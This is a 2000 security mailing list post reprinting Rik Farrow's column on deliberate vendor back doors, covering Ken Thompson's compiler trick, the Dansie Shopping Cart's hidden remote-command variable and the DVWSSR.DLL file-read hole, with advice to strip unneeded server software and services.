Information Security News mailing list archives
Close The Door
From: William Knowles <wk () C4I ORG>
Date: Fri, 11 Aug 2000 04:38:10 -0500
********************************************************************* Back Door Mania by Rik Farrow The first two weeks in April 2000 brought with them a bit of spring fever in the form of hype and media confusion over two back doors in Web server software. In each case, the back doors were put there deliberately by the vendors, although it was not their intention that either would be used for malicious purposes. Back doors have an illustrious history, with perhaps the most famous example being the code engineered by Ken Thompson. Thompson could log into any Unix system as any user by entering a magic password. The code for the back door was hidden inside of the compiler used to build the trojan login program, making it almost impossible to discover what he had done. Thompson carefully explained his cleverness during his acceptance speech for the Turing Award in 1984. Others have included back doors in their code. Eric Allman put back doors in the sendmail program, but the source code has always been available, making it relatively easy to uncover and remove them. AT&T field engineers used a bug in the Unix expreserve program to get root access while working on customers' systems. The most recent furor is over code included in Web server software. The first hint of trouble appeared on a newsgroup devoted to Perl programming for CGI (Common Gateway Interface) scripts. Kasey Johns was checking over some code his company had licensed, looking for security problems. The code in question was version 3.0.4 of the Dansie Shopping Cart. Johns reported that it was not easy checking this Perl script, as it was compressed from 7,000 lines into only 250 by removing newline characters. In the script, Johns discovered code that had been deliberately obscured by encrypting the command, email address, and subject line. The code sent email to tech () dansie net when the cart software was used. Another section of code accepted commands from a hidden variable that changed permissions on a data file required by the program and then overwrote it. Through this back door, Dansie received notification whenever someone began using the code, and could remotely delete a file, disabling the script, through the back door. According to emails from Dansie representatives to the Bugtraq mailing list, these mechanisms were used only as defenses against software pirates. But another posting to Bugtraq pointed out that the value associated with the hidden variable is not checked, permitting anyone who knows about it to execute arbitrary commands on the Web server. Dansie responded by removing the offending code in the next release, which was made available almost immediately, and providing a patch to existing releases. Another issue became an overnight sensation largely because of the words used as the encryption key: "Netscape engineers are weenies!" Rain Forest Puppy, or rfp, posted his second advisory of the year, explaining that DVWSSR.DLL, installed either with Option Pack 4 or with the Microsoft FrontPage extensions, permitted reading any file on the Web server. Rfp mentioned that the encryption key must be used to encrypt the filename first, and that only users who had access to DVWSSR.DLL, who are generally administrators and those who manage several virtual hosts on the same Web server, could take advantage of this back door. CORE SDI explored the same DLL and discovered that it was possible to overflow its buffer by sending it at least 5,000 characters as a value, causing IIS to stop functioning. (This would constitute a denial of service attack.) Again, the attacker would have to have access to the DLL for this to work. Someone would have had to have changed the access control list protecting the DLL to open up the vulnerability to remote attackers (or a remote attacker would have needed an administrator's password). Unfortunately, the press went wild with this, leading to some interesting self-contradictory remarks from the media. Microsoft put out several versions of security bulletin MS00-025, with a final suggestion that the offending DLL simply be removed. Including sneaky back doors in software may be appealing to programmers, but it is a certain way to stir up customer unrest when discovered. If you are running a Web server, I suggest you remove any software that you do not need on the server, shut down any network services at are not absolutely necessary, and use proper permissions and ownership on all files and directories. Web servers make attractive targets. Back doors, whether intentional or not, make them even more tempting. Shut your doors. Resources Creating a basic padded cell A tutorial with sample scripts http://www.sunworld.com/swol-01-1999/swol-01-security.html Web server wiles, Part one Secure your Solaris Web server from the perils of the Void http://www.sunworld.com/sunworldonline/swol-04-1996/swol-04-security.html Securing your Web server Stop the wrong people from accessing your site! Make sure your site is secure from prying eyes and malicious intent http://www.sunworld.com/sunworldonline/swol-06-1996/swol-06-webmaster.html ************************************************************************ About the author ---------------- Rik provides UNIX and Internet security consulting and training. He has been working with UNIX system security since 1984, and with TCP/IP networks since 1988. He has taught for the IRS, Department of Justice, NSA, US West, Royal Canadian Mounted Police, Swedish Navy, and for many US and European user groups. Farrow also consults with firms in the design and implementation of security applications. ********************************************************************* ********************************************************************* CUSTOMER SERVICE You can subscribe or unsubscribe to any of your e-mail newsletters by updating your form at: http://www.itworld.com/cgi-bin/w3-msql/newsletters/subcontent12.html? For subscription changes that cannot be handled via the web, please send an email to our customer service dept: support () itworld com ********************************************************************* http://www.itworld.com ISN is hosted by SecurityFocus.com --- To unsubscribe email LISTSERV () SecurityFocus com with a message body of "SIGNOFF ISN".
Current thread:
- Close The Door William Knowles (Aug 11)